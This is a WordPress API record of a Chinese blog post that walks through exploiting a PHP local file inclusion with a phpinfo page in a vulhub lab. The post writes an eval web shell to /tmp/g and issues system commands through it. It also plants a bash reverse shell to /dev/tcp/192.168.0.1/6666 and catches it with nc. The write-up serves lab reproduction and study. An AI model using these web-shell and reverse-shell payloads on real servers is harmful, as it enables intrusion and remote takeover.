{"id":1020,"date":"2022-11-14T09:01:38","date_gmt":"2022-11-14T01:01:38","guid":{"rendered":"https:\/\/blog.langsasec.cn\/?p=1020"},"modified":"2022-11-14T09:01:53","modified_gmt":"2022-11-14T01:01:53","slug":"php-inclusion","status":"publish","type":"post","link":"https:\/\/blog.langsasec.cn\/index.php\/2022\/11\/14\/php-inclusion\/","title":{"rendered":"php inclusion\u6f0f\u6d1e\u590d\u73b0"},"content":{"rendered":"<h2><span class=\"ez-toc-section\" id=\"%e5%88%a9%e7%94%a8%e5%9c%ba%e6%99%af\"><\/span>\u5229\u7528\u573a\u666f<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u5b58\u5728phpinfo\u9875\u9762\uff0c\u4e14\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5728\u627e\u4e0d\u5230\u597d\u7684\u6587\u4ef6\u5305\u542bgetshell\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u3002<\/p>\n<p><strong>\u8be5\u6f0f\u6d1e\u548cphp\u7248\u672c\u65e0\u5173\uff0c\u5373\u5168\u7248\u672c\u901a\u7528\u3002<\/strong><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e7%8e%af%e5%a2%83%e6%90%ad%e5%bb%ba\"><\/span>\u73af\u5883\u642d\u5efa<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u4f7f\u7528vulhub\u9776\u573a\uff0c\u8fdb\u5165\u6f0f\u6d1e\u76ee\u5f55\uff0c\u6267\u884c<code>docker-compose up -d<\/code> \u521b\u5efa\u5bb9\u5668\uff08\u5728root\u6743\u9650\u4e0b\u6267\u884c\uff09<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/a1914fce7edb383737d18e80ae8f408fcb22b923.png\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe\" alt=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe\" \/><\/p>\n<p>\u4e0b\u6587\u51fa\u73b0\u7684192.168.0.140\u5728\u590d\u73b0\u7684\u8fc7\u7a0b\u4e2d\u9700\u8981\u66ff\u6362\u6210\u4f60\u4eecvulhub\u642d\u5efa\u7684ip\uff0c\u67e5\u770b\u65b9\u6cd5\u5982\u4e0b\uff0c\u9700\u8981\u6ce8\u610f\u4f7f\u7528docker\u642d\u5efa\u7684\u9776\u573a\u5b58\u5728\u591a\u5f20\u7f51\u5361\uff0c\u8981\u786e\u8ba4\u597dip<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/d9ae615d30231b0b5d627afa4dcaa6b165ed08df.png\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe1\" alt=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe1\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e7%a1%ae%e8%ae%a4%e7%8e%af%e5%a2%83\"><\/span>\u786e\u8ba4\u73af\u5883<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u8bbf\u95eephpinfo\u9875\u9762\uff1a<code>http:\/\/192.168.0.140:8080\/phpinfo.php<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/6cd8cdd62d1d395cc3121ca2f3b31301f599c4fe.png\" alt=\"image-20221108150513783\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe2\" \/><\/p>\n<p>\u8bbf\u95ee\u6587\u4ef6\u5305\u542b\u9875\u9762\uff1a<code>http:\/\/192.168.0.140:8080\/lfi.php<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/b824fcc702129f676b930dee35dec5ee7c8594a9.png\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe3\" alt=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe3\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e5%86%99%e5%85%a5shell\"><\/span>\u5199\u5165shell<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u6267\u884cexp\u547d\u4ee4<code>py -2 .\\exp.py 192.168.0.140 8080 100<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/3d19256e625030de6a9ef23748b89bf59fb2b3bc.png\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe4\" alt=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe4\" \/><\/p>\n<p>\u8be5exp\u5199\u5165\u4e00\u4e2a\u6c38\u4e45\u7684shell  \/tmp\/g<\/p>\n<p>&lt;?=eval($_REQUEST[1])?&gt;')?&gt;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c\"><\/span>\u547d\u4ee4\u6267\u884c<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u5229\u7528\u6587\u4ef6\u5305\u542b\uff0c\u6267\u884c\u547d\u4ee4<\/p>\n<p><code>http:\/\/192.168.0.140:8080\/lfi.php?file=\/tmp\/g&amp;1=system(&#039;id&#039;));<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/e325edfde58fabf170780d5d5406213c314e538e.png\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe5\" alt=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe5\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e5%86%99%e5%85%a5%e5%8f%8d%e5%bc%b9shell\"><\/span>\u5199\u5165\u53cd\u5f39shell<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u901a\u8fc7get\u4f20\u9012\u6570\u636e\u5199\u5165\u53cd\u5f39shell<\/p>\n<p><code>http:\/\/192.168.0.140:8080\/lfi.php?file=\/tmp\/g&amp;1=system(&#039;echo &quot;&lt;?php system(\\&quot;bash -c \\&#039;exec bash -i %26&gt;\/dev\/tcp\/192.168.0.1\/6666 &lt;%261\\&#039;\\&quot;);?&gt;&quot;&gt;\/tmp\/2.php&#039;);<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/dbb1782dc7affad68447099b3f93be85bcb808ad.png\" alt=\"image-20221108153015969\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe6\" \/><\/p>\n<p>\u901a\u8fc7\u6784\u9020\u6210post\u4f20\u9012\u6570\u636e\u5199\u5165\u53cd\u5f39shell<\/p>\n<p><code>http:\/\/192.168.0.140:8080\/lfi.php?file=\/tmp\/g&amp;1=system($_POST[s]);<\/code><\/p>\n<p><code>s=echo &quot;&lt;?php system(\\&quot;bash -c &#039;exec bash -i %26&gt;\/dev\/tcp\/192.168.0.1\/6666 &lt;%261&#039;\\&quot;);?&gt;&quot;&gt;\/tmp\/2.php<\/code><\/p>\n<p>\u9875\u9762\u663e\u793a\u62a5\u9519\uff0c\u6ca1\u5173\u7cfb\uff0c\u53cd\u5f39shell\u5df2\u7ecf\u6210\u529f\u5199\u5165 <img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/894209804bdcc182262f52a96bd99b0636592acd.png\" alt=\"image-20221108153813220\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe7\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e5%8f%8d%e5%bc%b9shell\"><\/span>\u53cd\u5f39shell<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u4f7f\u7528<code>nc.exe -lvvp 6666<\/code> \u76d1\u542c6666\u7aef\u53e3<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/3c40f0d49de66eb779a43ffb2b718927a49d5118.png\" alt=\"image-20221108153243567\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe8\" \/><\/p>\n<p>\u8bbf\u95ee\u8be5\u9875\u9762\u5229\u7528\u6587\u4ef6\u5305\u542b\u6267\u884c\u53cd\u5f39shell<\/p>\n<p><code>http:\/\/192.168.0.140:8080\/lfi.php?file=\/tmp\/2.php<\/code><\/p>\n<p>\u663e\u793a\u6b63\u5728\u8fde\u63a5\uff0c\u7136\u540e\u5f97\u5230\u53cd\u5f39shell<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.hdslb.com\/bfs\/album\/3eecdaf7a2fdffbd1beedd88f925db351e1b2cf6.png\" title=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe9\" alt=\"php inclusion\u6f0f\u6d1e\u590d\u73b0\u63d2\u56fe9\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e8%8e%b7%e5%8f%96exp\"><\/span>\u83b7\u53d6exp<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote>\n<p>\u5173\u6ce8\u6d6a\u98d2sec\u56de\u590d<code>221109<\/code>\u83b7\u53d6exp\u4e0b\u8f7d\u5730\u5740<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>\u5229\u7528\u573a\u666f \u5b58\u5728phpinfo\u9875\u9762\uff0c\u4e14\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5728\u627e\u4e0d\u5230\u597d\u7684\u6587\u4ef6\u5305\u542bgetshell\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u3002 \u8be5\u6f0f [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[34],"tags":[],"class_list":["post-1020","post","type-post","status-publish","format-standard","hentry","category-vulfx"],"_links":{"self":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1020","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/comments?post=1020"}],"version-history":[{"count":1,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1020\/revisions"}],"predecessor-version":[{"id":1021,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1020\/revisions\/1021"}],"wp:attachment":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media?parent=1020"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/categories?post=1020"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/tags?post=1020"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}